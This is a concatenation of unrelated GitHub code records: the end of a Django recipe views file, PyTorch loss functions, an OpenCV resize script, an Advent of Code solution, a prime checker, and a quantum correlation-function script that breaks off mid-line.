Ricette.objects.get(id=id_ricetta)\n preferiti = Preferiti.objects.get(user=request.user)\n preferiti.lista.remove(ricetta)\n return redirect('preferiti')\n else:\n return redirect('home')\n\n\ndef idee_ricette(request):\n return render(request, 'ricette/idee_ricette.html')\n\ndef antipasti(request):\n return render(request, 'ricette/antipasti.html')\n\ndef primi(request):\n return render(request, 'ricette/primi.html')\n\ndef secondi(request):\n return render(request, 'ricette/secondi.html')\n\ndef dolci(request):\n return render(request, 'ricette/dolce.html')\n\ndef contorni(request):\n return render(request, 'ricette/contorni.html')\n\ndef intolleranti(request):\n return render(request, 'ricette/intolleranti.html')\n\n\n\n","repo_name":"laura0426/django_progettouni","sub_path":"ricette/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16160723765","text":"import math\nimport logging\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom utils.data_utils import get_per_cls_weights\n\n\ndef focal_loss(input_values, gamma):\n \"\"\"Computes the focal loss\"\"\"\n p = torch.exp(-input_values)\n loss = (1 - p) ** gamma * input_values\n return loss.mean()\n\nclass FocalLoss(nn.Module):\n def __init__(self, cls_num_list=None, gamma=0., imbalance_beta=0.9999, args=None):\n super(FocalLoss, self).__init__()\n assert gamma >= 0\n self.args = args\n self.gamma = gamma\n self.imbalance_beta = imbalance_beta\n if self.args.imbalance_loss_reweight:\n self.weight = get_per_cls_weights(cls_num_list, imbalance_beta)\n else:\n self.weight = None\n\n def update(self, **kwargs):\n if self.args.imbalance_loss_reweight:\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n if \"imbalance_beta\" in kwargs and kwargs[\"imbalance_beta\"] is not None:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], kwargs[\"imbalance_beta\"])\n else:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], self.imbalance_beta)\n else:\n pass\n else:\n logging.info(\"WARNING: the imbalance weight has not been updated.\")\n self.weight = None\n\n def 
forward(self, input, target):\n return focal_loss(F.cross_entropy(input, target, reduction='none', weight=self.weight), self.gamma)\n\nclass LDAMLoss(nn.Module):\n def __init__(self, cls_num_list=None, max_m=0.5, s=30, imbalance_beta=0.9999, args=None):\n super(LDAMLoss, self).__init__()\n self.args = args\n self.imbalance_beta = imbalance_beta\n m_list = 1.0 / np.sqrt(np.sqrt(cls_num_list))\n m_list = m_list * (max_m / np.max(m_list))\n # m_list = torch.cuda.FloatTensor(m_list)\n self.m_list = m_list\n self.max_m = max_m\n assert s > 0\n self.s = s\n if self.args.imbalance_loss_reweight:\n self.weight = get_per_cls_weights(cls_num_list, imbalance_beta)\n else:\n self.weight = None\n\n def update(self, **kwargs):\n if self.args.imbalance_loss_reweight:\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n if \"imbalance_beta\" in kwargs and kwargs[\"imbalance_beta\"] is not None:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], kwargs[\"imbalance_beta\"])\n else:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], self.imbalance_beta)\n else:\n pass\n else:\n logging.info(\"WARNING: the imbalance weight has not been updated.\")\n self.weight = None\n\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n cls_num_list = kwargs[\"cls_num_list\"]\n m_list = 1.0 / np.sqrt(np.sqrt(cls_num_list))\n m_list = m_list * (self.max_m / np.max(m_list))\n # m_list = torch.cuda.FloatTensor(m_list)\n self.m_list = m_list\n else:\n pass\n\n def forward(self, x, target):\n index = torch.zeros_like(x, dtype=torch.uint8, device=x.device)\n index.scatter_(1, target.data.view(-1, 1), 1)\n index_float = index.type(torch.cuda.FloatTensor)\n self.m_list = torch.cuda.FloatTensor(self.m_list).to(device=x.device)\n batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0,1))\n batch_m = batch_m.view((-1, 1))\n x_m = x - batch_m\n output = torch.where(index, x_m, x)\n return F.cross_entropy(self.s*output, target, weight=self.weight)\n\n\n\n # def forward(self, x, target, m_list=None, weight=None):\n # index = torch.zeros_like(x, dtype=torch.uint8)\n # index.scatter_(1, target.data.view(-1, 1), 1)\n \n # index_float = index.type(torch.cuda.FloatTensor)\n # if m_list is not None:\n # batch_m = torch.matmul(m_list[None, :], index_float.transpose(0,1))\n # else:\n # batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0,1))\n\n # if weight is not None:\n # input_weight = weight\n # else:\n # input_weight = self.weight\n\n # batch_m = batch_m.view((-1, 1))\n # x_m = x - batch_m\n \n # output = torch.where(index, x_m, x)\n # return F.cross_entropy(self.s*output, target, weight=input_weight)\n\n\ndef linear_combination(x, y, epsilon): \n return epsilon*x + (1-epsilon)*y\n\ndef reduce_loss(loss, reduction='mean'): \n return loss.mean() if reduction=='mean' else loss.sum() if reduction=='sum' else loss \n\nclass LabelSmoothingCrossEntropy(nn.Module): \n def __init__(self, epsilon:float=0.1, reduction='mean'): \n super().__init__() \n self.epsilon = epsilon \n self.reduction = reduction \n\n def forward(self, preds, target): \n n = preds.size()[-1] \n log_preds = F.log_softmax(preds, dim=-1) \n loss = reduce_loss(-log_preds.sum(dim=-1), self.reduction) \n nll = F.nll_loss(log_preds, target, reduction=self.reduction) \n return linear_combination(loss/n, nll, self.epsilon)\n\n\n\n\n\n\n\ndef cross_pair_norm(src_labels, src_features, tgt_labels, tgt_features):\n norm = 0\n count = 0\n for i in range(len(src_labels)):\n for j in 
range(len(tgt_labels)):\n if src_labels[i] == tgt_labels[j]:\n count += 1\n norm += torch.linalg.norm(src_features[i] - tgt_features[j], ord=2, dim=0).sum()\n return norm / count\n\n\n\ndef pair_norm(labels, features):\n norm = 0\n count = 0\n for i in range(len(labels)):\n for j in range(i + 1, len(labels)):\n if labels[i] == labels[j]:\n count += 1\n norm += torch.linalg.norm(features[i] - features[j], ord=2, dim=0).sum()\n return norm / count\n","repo_name":"wizard1203/GossipFL","sub_path":"loss_fn/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"70251526728","text":"import numpy as np\nimport cv2 \n\nimg1 = cv2.imread('IMG_5760.JPG')\nimg2 = cv2.imread('IMG_5761.JPG')\nimg3 = cv2.imread('IMG_5762.JPG')\n\n#shrink images by a factor of 4\nimg1small = cv2.resize(img1, (0,0), fx = 0.25, fy = 0.25)\nimg2small = cv2.resize(img2, (0,0), fx = 0.25, fy = 0.25)\nimg3small = cv2.resize(img3, (0,0), fx = 0.25, fy = 0.25)\n\ncv2.imwrite('IMG_5760_2.JPG', img1small)\ncv2.imwrite('IMG_5761_2.JPG', img2small)\ncv2.imwrite('IMG_5762_2.JPG', img3small)\n","repo_name":"ThomasSwinicki/SDP","sub_path":"positive/p_forward/test/shrink.py","file_name":"shrink.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1920969355","text":"import os\nimport functools\n\n# input_file = open(os.path.join(os.path.dirname(__file__), './test_input.txt'))\ninput_file = open(os.path.join(os.path.dirname(__file__), './input.txt'))\nlines = list(map(lambda l: list(l.replace('\\n', '')), input_file)) # double array\n\n\ndef solve(lines, x, y, step_x, step_y, treeHitCount):\n if lines[y][x%len(lines[0])] == '#':\n treeHitCount += 1\n\n x += step_x\n y += step_y\n\n if y >= len(lines):\n return treeHitCount\n else:\n return solve(lines, x, y, step_x, step_y, treeHitCount)\n\n\nprint('Solution 1:', solve(lines, 0, 0, 3, 1, 0))\n\nprint('Solution 2:', functools.reduce(\n lambda a, b: a * b, \n [\n solve(lines, 0, 0, 1, 1, 0),\n solve(lines, 0, 0, 3, 1, 0),\n solve(lines, 0, 0, 5, 1, 0),\n solve(lines, 0, 0, 7, 1, 0),\n solve(lines, 0, 0, 1, 2, 0)\n ]\n))\n","repo_name":"elonmallin/advent-of-code-2020","sub_path":"day03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26492685677","text":"a=int(input(\"Enter The Number:\"))\r\nb=0\r\nfor i in range(2,a):\r\n if(a%i==0):\r\n b+=1\r\n break\r\nif(b==0):\r\n print(\"Number Is Prime Number\")\r\nelse:\r\n print(\"It Is Not A Prime Number\")","repo_name":"Abhishek01210/IBM-Projects","sub_path":"Prime Number.py","file_name":"Prime Number.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4388374642","text":"###=============================================================###\n### Exact evaluation of KT and DKT correlations for simple\t###\n### Hamiltonians using Gauss-Hermite (i.e. 
HO) basis sets.\t###\n### The 2D TCF computed are:\t\t\t\t\t\t\t\t\t###\n### 1a) DKT correlation <A;B(t1);C(t2)>\t\t\t\t\t\t###\n### 1b) DKT correlation <dot(A);dot(B)(t1);C(t2)>\t\t\t\t\t\t###\n### 2) standard TCF <AB(t1)C(t2)>\t\t\t\t\t\t\t\t###\n### 3) standard TCF <B(t1)C(t2)A>\t\t\t\t\t\t\t\t###\n### 4) standard TCF <C(t2)AB(t1)>\t\t\t\t\t\t\t\t###\n### 5) standard TCF <AC(t2)B(t1)>\t\t\t\t\t\t\t\t###\n### 6) standard TCF <C(t2)B(t1)A>\t\t\t\t\t\t\t\t###\n### 7) standard TCF <B(t1)AC(t2)>\t\t\t\t\t\t\t\t###\n### The 1D TCF computed are:\t\t\t\t\t\t\t\t\t###\n### 1) KT correlation <A;B(t1)>\t\t\t\t\t\t\t\t###\n###=============================================================###\nhbar=1.0\nimport sys\nimport numpy as np\nimport scipy.linalg as linn\nimport time as get_time\nonly_freq =True\nonly_freq =False\ncompute_DKT=True\ncompute_PB=True\ncompute_std=True\nt_init=get_time.time()\n###================================================================\n### read some parameters from command line\n\n### usage\nif(len(sys.argv)<=2):\n\tprint('Usage: python {} potential beta A B C (cubic coef)'.format(sys.argv[0]))\n\tprint('Potential should be \"HO\" or \"WAP\" or \"QP\" or \"WQP\" or \"OHqtip4pf\" or \"QPper\" or \"Chaos\" ')\n\tprint('A,B,C should be x or x2')\n\tsys.exit() \n### potential\npotential=sys.argv[1]\nif(potential!='HO' and potential!='WAP' and potential!='QP' and potential!='WQP' and potential!='OHqtip4pf' and potential!='QPper' and potential!='Chaos'):\n\tsys.exit('potential \"{}\" not defined. potential should be \"HO\" or \"WAP\" or \"QP\" or \"WQP\" or \"OHqtip4pf\" or \"QPper\" or \"Chaos\" '.format(potential))\nprint('potential = ',potential)\n\nif(len(sys.argv)!=6 and len(sys.argv)!=7):\n\tsys.exit('Usage: python {} potential beta A B C (cubic coef)'.format(sys.argv[0]))\n\n\n### beta: length of the imaginary timestep (au)\nbeta=float(sys.argv[2])\nprint('beta = ',beta)\n\n### observables\nA_obs = sys.argv[3]\nB_obs = sys.argv[4]\nC_obs = sys.argv[5]\n\nif(A_obs!='x' and A_obs!='x2' and B_obs!='x' and B_obs!='x2' and C_obs!='x' and C_obs!='x2'):\n\tsys.exit('observable not defined. 
observable should be \"x\" or \"x2\"')\nprint('A = ',A_obs)\nprint('B = ',B_obs)\nprint('C = ',C_obs)\n\n###================================================================\n\n###================================================================\n### define some parameters of the simulation\n\ndt = .5\t\t\t# time step (au)\nnstep = 100\t# number of time step\n#nstep = 200\t# number of time step\n\n\n#Standard yair\nnb = 200\t\t# number of basis functions to use\ntnb = 16\t\t# truncated basis set \n\n#Tighter 1\n#nb = 400\t\t# number of basis functions to use\n#tnb = 16\t\t# truncated basis set \n\n#Tighter 2\n#nb = 400\t\t# number of basis functions to use\n#tnb = 32\t\t# truncated basis set \n\nprint('Simulation parameters')\nprint('dt = ',dt)\nprint('nstep = ',nstep)\nprint('nb/tnb = ',nb,tnb)\n\n###================================================================\n\n###================================================================\n### define some parameters of the Hamiltonian\n### Note: using m=omega=1\n### H = p^2/2 + a*x^2 + b*x^3 + c*x^4\n\nif(potential=='HO'):\n\t### Harmonic Oscillator\n\ta = 0.5\n\tb = 0.\n\tc = 0.\n\tmass=1.0\nelif(potential=='WAP'):\n\t### Weakly Anharmonic Potential\n\ta = 0.5\n\tb = 0.1\n\tc = 0.01\n\tmass=1.0\nelif(potential=='QPper'):\n\t### Weakly Cubic Potential\n\ta = 0.5\n\tb = 0.0\n\ttry:\n\t c= float(sys.argv[6])\n\t print('Cuartic coefficient is : {}\\n'.format(c))\n\texcept:\n\t raise ValueError('Please specify cuartic coefficient\\n\\n')\n\tmass=1.0\nelif(potential=='QP'):\n\t### Quartic Potential\n\ta = 0.\n\tb = 0.\n\tc = 0.25\n\tmass=1.0\nelif(potential=='OHqtip4pf'):\n\t### OH stretch from qtip4pf\n\talpha=1.21\n\ta = 0.5\n\tb = -alpha*0.5 #-0.6\n\tc = +7./24. *(alpha)**2 #+0.42\n\tmass=1.0\nelif(potential=='WQP'):\n\t### Weakly Cubic Potential\n\ta = 0.5\n\ttry:\n\t b= float(sys.argv[6])\n\t print('Cubic coefficient is : {}\\n'.format(b))\n\texcept:\n\t raise ValueError('Please specify cubic coefficient\\n\\n')\n\tc = b**2\n\tmass=1.0\nelif(potential=='Chaos'):\n\t### DW Potential\n\tmass = 0.5\n\tg = 0.08\n\twb = 2.0\n\n\ta = g * ( -2.0*(-mass*wb**2) / (4*g) )\n\tb = 0.0\n\tc = g**2\n\nprint('Potential parameters = ',a,b,c)\nprint('mass =',mass)\n\n###================================================================\n\n###================================================================\n### define time grid \n\ntime = np.zeros(nstep)\nfor i in range(nstep):\n\ttime[i] = i*dt - nstep*dt/2. 
#ALBERTO (negative and positive times)\n\t#time[i] = i*dt # only positive times \n###================================================================\n\n###================================================================\n### construct the Hamiltonians in the Gauss-Hermite basis\n\nprint('Start Hamiltonian construction')\n\n### x matrix\nx_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+1):\n\t\t\tx_mtrx[i,j] = np.sqrt(j+1)\n\t\tif i == (j-1):\n\t\t\tx_mtrx[i,j] = np.sqrt(j)\nx_mtrx *= (2.*mass)**(-0.5) \n\n### x^2 matrix\nx2_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+2):\n\t\t\tx2_mtrx[i,j] = np.sqrt((j+1)*(j+2))\n\t\tif i == j:\n\t\t\tx2_mtrx[i,j] = 2*j+1\n\t\tif i == (j-2):\n\t\t\tx2_mtrx[i,j] = np.sqrt(j*(j-1))\nx2_mtrx *= (2.0*mass)**(-1.)\n\n### p^2 matrix\np2_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+2):\n\t\t\tp2_mtrx[i,j] = -np.sqrt((j+1)*(j+2))\n\t\tif i == j:\n\t\t\tp2_mtrx[i,j] = 2*j+1\n\t\tif i == (j-2):\n\t\t\tp2_mtrx[i,j] = -np.sqrt(j*(j-1))\np2_mtrx *= (mass/2.0)\n\n### x^3 matrix\nx3_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+3):\n\t\t\tx3_mtrx[i,j] = np.sqrt((j+1)*(j+2)*(j+3))\n\t\tif i == (j+1):\n\t\t\tx3_mtrx[i,j] = j*np.sqrt(j+1) + (j+1)**(1.5) + (j+2)*np.sqrt(j+1)\n\t\tif i == (j-1):\n\t\t\tx3_mtrx[i,j] = (j-1)*np.sqrt(j) + j**(1.5) + (j+1)*np.sqrt(j)\n\t\tif i == (j-3):\n\t\t\tx3_mtrx[i,j] = np.sqrt(j*(j-1)*(j-2))\nx3_mtrx *= (2.0*mass)**(-1.5)\n\n### x^4 matrix\nx4_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+4):\n\t\t\tx4_mtrx[i,j] = np.sqrt((j+1)*(j+2)*(j+3)*(j+4))\n\t\tif i == (j+2):\n\t\t\tx4_mtrx[i,j] = j*np.sqrt((j+1)*(j+2)) + np.sqrt(j+2)*(j+1)**(1.5) + np.sqrt(j+1)*(j+2)**(1.5) + np.sqrt((j+1)*(j+2))*(j+3)\n\t\tif i == j:\n\t\t\tx4_mtrx[i,j] = j*(j-1) + j*j + 2*j*(j+1) + (j+1)*(j+1) + (j+1)*(j+2)\n\t\tif i == (j-2):\n\t\t\tx4_mtrx[i,j] = (j-2)*np.sqrt(j*(j-1)) + np.sqrt(j)*(j-1)**(1.5) + np.sqrt(j-1)*(j)**(1.5) + np.sqrt(j*(j-1))*(j+1)\n\t\tif i == (j-4):\n\t\t\tx4_mtrx[i,j] = np.sqrt(j*(j-1)*(j-2)*(j-3))\nx4_mtrx *= (2.0*mass)**(-2)\n\n### Hamiltonian\nHam = 0.5 * p2_mtrx + a * x2_mtrx + b * x3_mtrx + c * x4_mtrx\n\nprint('End Hamiltonian construction')\n\n###================================================================\n\n###================================================================\n### Diagonalization of the Hamiltonians\n\nprint('Begin diagonalization')\n\nvals,vecs = linn.eigh(Ham)\n\nprint('End diagonalization')\n###================================================================\n\n###================================================================\n### compute partition functions\n\nZ = 0.0\nfor i in range(tnb):\n\tZ += np.exp(-beta*vals[i])\n\nprint('Z = ',Z)\n\nfor i in range(1,2):\n print(vals[i]/vals[i-1])\nif only_freq:\n sys.exit()\n###================================================================\n\n###================================================================\n### Build the observables matrix in the energy eigen-basis\n###================================================================\n### The matrix elements must be expanded in HO eigenstates and weighted \n### by the coeficients of the HO eigenstates\n### |n> = Sum_j_{0}^{nb} c_j*|j>\n\nprint('Begin building of observables matrix')\n\nclist = np.zeros((tnb,tnb+2))\nfor n in range(tnb):\n\tfor j in range(tnb):\t# indexes are inverted\n\t\tclist[n,j] = vecs[j,n]\n\n### 
observable X\n\nx_eig = np.zeros((tnb,tnb)) \nfor f in range(tnb):\n\tfor g in range(tnb):\n\t\tfor i in range(tnb):\n\t\t\tx_eig[f,g] += clist[f,i]*clist[g,i-1]*np.sqrt(i) + clist[f,i]*clist[g,i+1]*np.sqrt(i+1)\nx_eig *= 2.**(-0.5)\n\n### observable X^2\n\nx2_eig = np.zeros((tnb,tnb)) \nfor f in range(tnb):\n\tfor g in range(tnb):\n\t\tfor i in range(tnb):\n\t\t\tx2_eig[f,g] += clist[f,i]*clist[g,i-2]*np.sqrt(i*(i-1)) + clist[f,i]*clist[g,i]*(2*i+1)+clist[f,i]*clist[g,i+2]*np.sqrt((i+1)*(i+2))\nx2_eig *= 2.**(-1)\n\nprint('End building of observables matrix')\n###================================================================\n\n###================================================================\n### Define observables\n\nif(A_obs=='x'):\n\tA = x_eig\nelif(A_obs=='x2'):\n\tA = x2_eig\n\nif(B_obs=='x'):\n\tB = x_eig\nelif(B_obs=='x2'):\n\tB = x2_eig\n\nif(C_obs=='x'):\n\tC = x_eig\nelif(C_obs=='x2'):\n\tC = x2_eig\n\n###================================================================\n### Evaluate the KT correlation <A;B(t1)>\n### Note: Evaluation of KT as Re{<A;B(t1)>}\n\nprint('Begin KT')\n\nKT = np.zeros(nstep,dtype=complex)\n\nfor t1 in range(nstep):\n\tprint('step ',t1,' of ',nstep,'total')\n\n\tfor n in range(tnb):\t# trace\n\t\tfor m in range(tnb):\n\t\t\t\tfct_beta = np.exp(-beta*vals[n]) \n\t\t\t\tif (n==m):\n\t\t\t\t\tfct_beta *= beta\n\t\t\t\telse:\n\t\t\t\t\tfreq = vals[n] - vals[m] \n\t\t\t\t\tfct_beta *= (np.exp(beta*freq) - 1.) / freq\n\n\t\t\t\tKT[t1] += fct_beta\t\\\n\t\t\t\t\t * A[n,m]\t\t\\\n\t\t\t\t\t * B[m,n] * np.exp(1.j*time[t1]*(vals[m]-vals[n])) \n\nKT /= (beta*Z)\n\n### taking Re{KT}\n\nKT = KT.real\n\nprint('End KT')\n###================================================================\n\n###================================================================\n### Evaluate the DKT correlation <A;B(t1);C(t2)>\n### Note: Analytic integration of DOuble Kubo integral\n\nif compute_DKT:\n\tprint('Begin DKT')\n\tDKT = np.zeros([nstep,nstep],dtype=complex)\n\tDKTp1 = np.zeros([nstep,nstep],dtype=complex)\n\tDKTp2 = np.zeros([nstep,nstep],dtype=complex)\n\tDKTpp = np.zeros([nstep,nstep],dtype=complex)\n\tDKTpp2 = np.zeros([nstep,nstep],dtype=complex)\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\n\t\t\t\t\t\tif s == r == q:\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*beta**2/2. \n\t\t\t\t\t\telif r == s:\n\t\t\t\t\t\t\tdelta = (vals[q]-vals[r])\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])/delta**2 * ( np.exp(beta*delta)*(beta*delta-1.)+1) \n\t\t\t\t\t\telif q == s:\n\t\t\t\t\t\t\tB_ijk = (np.exp(beta*(vals[q]-vals[r]))-1.) / ((vals[q]-vals[r])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(beta/(vals[r]-vals[s]) - B_ijk) \n\t\t\t\t\t\telif q == r:\n\t\t\t\t\t\t\tA_ijk = (np.exp(beta*(vals[q]-vals[s]))-1.) / ((vals[q]-vals[s])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(A_ijk - beta/(vals[r]-vals[s])) \n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tA_ijk = (np.exp(beta*(vals[q]-vals[s]))-1.) / ((vals[q]-vals[s])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tB_ijk = (np.exp(beta*(vals[q]-vals[r]))-1.) 
/ ((vals[q]-vals[r])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(A_ijk-B_ijk) \n\n\t\t\t\t\t\tDKT[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tDKTp1[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j) * (vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\t\n\t\t\t\t\t\tDKTp2[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] \\\n\t\t\t\t\t\t * B[r,s] * (1.j)*(vals[r] - vals[s]) * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tDKTpp[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j)*(vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * (1.j)*(vals[r] - vals[s]) * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\t\n\t\t\t\t\t\tDKTpp2[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j)*(vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * (1.j)*(vals[s] - vals[q]) * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\n\n\tDKT /= (Z*beta**2)\n\tDKTp1 /= (Z*beta**2)\n\tDKTp2 /= (Z*beta**2)\n\tDKTpp /= (Z*beta**2)\n\tDKTpp2 /= (Z*beta**2)\n\n\tprint('End DKT ')\n\n###================================================================\n\n\nif compute_PB:\n\tprint('Begin KT_PB')\n\n\tKT_PB_ABC = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_ABCp = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_CBA = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_CBAp = np.zeros([nstep,nstep],dtype=complex)\n\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\t\t\t\t\t\tfreq1 = vals[q] - vals[r] \n\t\t\t\t\t\tfreq2 = vals[r] - vals[s] \n\t\t\t\t\t\tfreq3 = vals[s] - vals[q] \n\t\t\t\t\t\tfreq4 = vals[q] - vals[s] \n\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q]) \n\t\t\t\t\t\t#if (q==r):\n\t\t\t\t\t\tif (q==s):\n\t\t\t\t\t\t\tfct_beta *= beta\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t#fct_beta *= (np.exp(beta*freq1) - 1.) / (freq1)\n\t\t\t\t\t\t\tfct_beta *= (np.exp(beta*freq4) - 1.) 
/ (freq4)\n\t\t\t\t\t\t#aux_1 = fct_beta * A[q,r] * B[r,s] * C[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\t#aux_2 = fct_beta * A[q,r] * C[r,s] * B[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq3)) \n\t\t\t\t\t\taux_1a = fct_beta * A[q,r] * B[r,s] * C[s,q] * np.exp(1.j*time[t2]*(freq3)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\taux_1b = fct_beta * A[r,s] * B[q,r] * C[s,q] * np.exp(1.j*time[t2]*(freq3)) * np.exp(1.j*time[t1]*(freq1)) \n\t\t\t\t\t\taux_2a = fct_beta * C[q,r] * B[r,s] * A[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\taux_2b = fct_beta * C[r,s] * B[q,r] * A[s,q] * np.exp(1.j*time[t2]*(freq2)) * np.exp(1.j*time[t1]*(freq1)) \n\t\n\t\t\t\t\t\tKT_PB_ABC[t1,t2] += (1.j/hbar)*(aux_1a - aux_1b)\n\t\t\t\t\t\tKT_PB_ABCp[t1,t2] += (1.j/hbar)* (1.j/hbar)* ( (aux_1a * (vals[q]-vals[r])) - (aux_1b * (vals[r]-vals[s])) )\n\t\n\t\t\t\t\t\tKT_PB_CBA[t1,t2] += (1.j/hbar)*(aux_2a - aux_2b)\n\t\t\t\t\t\tKT_PB_CBAp[t1,t2] += (1.j/hbar)* (1.j/hbar)* ( (aux_2a * (vals[s]-vals[q])) - (aux_2b * (vals[s]-vals[q])) )\n\n\n\n\tKT_PB_ABC /= (beta*Z)\n\tKT_PB_ABCp /= (beta*Z)\n\tKT_PB_CBA /= (beta*Z)\n\tKT_PB_CBAp /= (beta*Z)\n\n\tprint('End KT_PB_ABC')\n\n###=====================================================================\n### Evaluate standard functions (i.e. C_{ABC}) \nif compute_std:\n\tprint('Begin standard TCF')\n\n\tC_ABC = np.zeros([nstep,nstep],dtype=complex)\n\tC_BCA = np.zeros([nstep,nstep],dtype=complex)\n\tC_CAB = np.zeros([nstep,nstep],dtype=complex)\n\tC_ACB = np.zeros([nstep,nstep],dtype=complex)\n\tC_CBA = np.zeros([nstep,nstep],dtype=complex)\n\tC_BAC = np.zeros([nstep,nstep],dtype=complex)\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\t\n\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])\n\t\n\t\t\t\t\t\tC_ABC[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\t\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q])) \n\n\t\t\t\t\t\tC_BCA[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * B[q,r] * np.exp(1.j*time[t1]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * C[r,s] * np.exp(1.j*time[t2]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * A[s,q]\t\n\n\t\t\t\t\t\tC_CAB[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * C[q,r] * np.exp(1.j*time[t2]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * A[r,s]\t\\\n\t\t\t\t\t\t * B[s,q] * np.exp(1.j*time[t1]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tC_BAC[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * B[q,r] * np.exp(1.j*time[t1]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * A[r,s]\t\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - 